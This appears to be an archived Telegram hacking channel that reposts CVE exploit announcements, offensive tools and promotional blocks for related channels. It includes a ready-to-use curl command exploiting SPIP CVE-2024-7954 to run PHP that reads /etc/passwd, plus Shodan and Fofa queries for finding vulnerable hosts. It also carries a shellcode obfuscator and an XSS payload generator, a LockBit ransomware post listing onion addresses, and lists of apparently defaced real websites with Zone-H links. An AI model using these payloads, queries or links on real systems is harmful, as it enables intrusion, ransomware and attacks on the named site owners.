HackTheBox Academy
Closed channel
🔴Learn About #Linux 🔴Learn About #Windows 🔴Learn About #CVE 🔴Learn About #EXPLOIT 🔴Learn About #Vulnerability ✅ADMIN : @NullByte0x1
Show more3 327
Subscribers
No data24 hours
-207 days
-9330 days
Posts Archive
3 327
↔️ CVE-2024-45387
❗️ An SQL injection vulnerability in Traffic Ops in Apache Traffic Control <= 8.0.1, >= 8.0.0 allows a privileged user with role "admin", "federation", "operations", "portal", or "steering" to execute arbitrary SQL against the database by sending a specially-crafted PUT request.
🖥 Exploit - POC
🔎 HUNTER:
product.name="Apache Traffic Server"🔎Fofa:
product="APACHE-Traffic-Server"#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
↔️ CVE-2024-7954
❗️ The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.
🖥 Exploit - POC
⚔️ Nuclei-Template
🔎 SHODAN:
app="SPIP"🔎Fofa:
app="SPIP"🎯 Manually Exploit:
curl -X POST "https://TARGET.COM/index.php?action=porte_plume_previsu" -H "Content-Type: application/x-www-form-urlencoded" -d 'data=AA_[<img111111>->URL`<?php system("cat /etc/passwd"); ?>`]_BB'
#Ethical_Hacker #Exploit #RCE
#CVE #Pentest #Vulnerability
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security3 327
↔️ CVE-2024-7954
❗️ The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.
🖥 Exploit - POC
⚔️ Nuclei-Template
🔎 SHODAN:
app="SPIP"🔎Fofa:
app="SPIP"#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
🌎 Cross Site Request Forgery | how scammers create fake websites and links?!
#Course #Ethical_Hacker
#Web #XSS #Phishing
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
https://aliagacemar.com
Web.Archive Zone-H
https://autogarageturkiye.com
Web.Archive Zone-H
https://karadagdanismanlik.com/
Web.Archive Zone-H
https://karadagizmirkuafor.com
Web.Archive Zone-H
https://makedonyaarabakiralama.com/
Web.Archive Zone-H
https://makedonyasirketkurmak.com/
Web.Archive Zone-H
https://advertseo.com/
Web.Archive Zone-H
3 327
🌎 Remotely Control Any TV.
#Course #Security
#ADB #Android
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
🛡 LexiCrypt is a shellcode obfuscation and encoding tool that transforms raw shellcode bytes into a "lexicon" of words derived from file names in the windows system32 directory, the /usr/bin directory on linux, or use a randomly generated list at runtime. The resulting encoded output can then be embedded into a code template in various programming languages (e.g., C++, Rust, C#, Go, VBScript/WScript).
🖥 GitHub
#Encryption #Tool #ShellCode
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
https://onfiredatacenter.com/
Web-Archive Zone-H
https://onfiregroup.com.br/
Web-Archive Zone-H
https://onfiredatacenter.com.br/index.html
Web.Archive Zone-H
https://easyprolaunch.shop/
Web.Archive Zone-H
https://ketovital.shop/
Web.Archive Zone-H
https://exclusiveofferofficialsite.shop/
Web.Archive Zone-H
https://bestmethod.shop/
Web.Archive Zone-H
https://lp.easyprolaunch.shop/
Web.Archive Zone-H
https://lp.ketovital.shop/
Web.Archive Zone-H
https://lp.exclusiveofferofficialsite.shop/
Web.Archive Zone-H
3 327
🔠 XSSDynaGen
⭐️ XSSDynaGen is a tool designed to analyze URLs with parameters, identify the characters allowed by the server, and generate advanced XSS payloads based on the analysis results.
💫 Features:
💜 Curated Passive Sources to maximize comprehensive URL discovery
💜 Tests allowed and blocked characters for each parameter.
💜 Produces tailored XSS payloads based on server allowed characters.
💜 Generates payloads with techniques like null bytes, Unicode encoding, and obfuscation.
🖥 GitHub
#Web #Tools #XSS
#Pentest #Ethical_Hacker
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
🔒 LOCKBIT 🔒
🎃 LockBit Ransomware Is Malicious Software Designed To Block User Access To Computer Systems In Exchange For A Ransom Payment.
🌎 VERSION 4 IS RELEASED.
http://lockbitapyx2kr5b7ma7qn6ziwqgbrij2czhcbojuxmgnwpkgv2yx2yd.onion http://lockbitapyum2wks2lbcnrovcgxj7ne3ua7hhcmshh3s3ajtpookohqd.onion http://lockbitapp24bvbi43n3qmtfcasf2veaeagjxatgbwtxnsh5w32mljad.onion http://lockbitapo3wkqddx2ka7t45hejurybzzjpos4cpeliudgv35kkizrid.onion http://lockbitapiahy43zttdhslabjvx4q6k24xx7r33qtcvwqehmnnqxy3yd.onion#RansomWare #Hacking #Pentest #Ethical_Hacker #LockBit #Tools ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
↔️ CVE-2024-56145
❗️ Users of affected versions are affected by this vulnerability if their php.ini configuration has
register_argc_argv enabled. For these users an unspecified remote code execution vector is present.
🖥 Exploit - POC
🔎 Hunter.How:
product.name="Craft CMS"🔎Fofa:
product="craft-cms"#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
↔️ CVE-2024-50379
❗️ Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability during JSP compilation in Apache Tomcat permits an RCE on case insensitive file systems when the default servlet is enabled for write (non-default configuration).
🖥 Exploit - POC
⚔️ Nuclei-Template
🔎 Hunter.How:
product.name="Apache Tomcat"🔎Fofa:
product="APACHE-Tomcat"#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️
💠 تست نفوذ را رایگان یاد بگیر .
⭕️ @TryHackBox
📖 کتاب ها و منابع Cyber Security
📚 @LibrarySecOfficial
💠 رودمپ های مختلف از جمله ردتیم بلوتیم تست نفوذ و ...
⭕️ @TryHackBoxOfficial
💠 منابع BlueTeam :
⭕️ @BlueTeamKit
💠 ابزارها و دوره های OSINT
⭕️ @OsintGit
💠 برگزاری دوره های امنیت سایبری
⭕ @kasraone_com
💠 تمامی منابع Red Team اینجاست!
💠 آموزش توسعه بدافزار (رایگان)
⭕ @RedTeamVillageRTV
💠 منابع CTF و رایت آپ ها و دوره های HackTheBox :
⭕ @PfkCTF
💠پنتست وب رو یاد بگیر
⭕️ @GitBook_s
💠 دوره های آموزشی, CVE-Exploit
⭕ @HackTheBox_Academy
💠 برای اضافه شدن در لیست پیام دهید :
🤖 @Unique_exploitbot
⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️
3 327
⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️
💠 تست نفوذ را رایگان یاد بگیر .
⭕️ @TryHackBox
📖 کتاب ها و منابع Cyber Security
📚 @LibrarySecOfficial
💠 رودمپ های مختلف از جمله ردتیم بلوتیم تست نفوذ و ...
⭕️ @TryHackBoxOfficial
💠 منابع BlueTeam :
⭕️ @BlueTeamKit
💠 ابزارها و دوره های OSINT
⭕️ @OsintGit
💠 برگزاری دوره های امنیت سایبری
⭕ @kasraone_com
💠 تمامی منابع Red Team اینجاست!
💠 آموزش توسعه بدافزار (رایگان)
⭕ @RedTeamVillageRTV
💠 منابع CTF و رایت آپ ها و دوره های HackTheBox :
⭕ @PfkCTF
💠پنتست وب رو یاد بگیر
⭕️ @GitBook_s
💠 دوره های آموزشی, CVE-Exploit
⭕ @HackTheBox_Academy
💠 برای اضافه شدن در لیست پیام دهید :
🤖 @Unique_exploitbot
⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️
3 327
↔️ CVE-2024-53376
❗️ CyberPanel before 2.3.8 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the phpSelection field to the websites/submitWebsiteCreation URI.
🖥 Exploit - POC
🔎 Hunter.How:
product.name="CyberPanel"🔎Fofa:
product="CyberPanel"#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
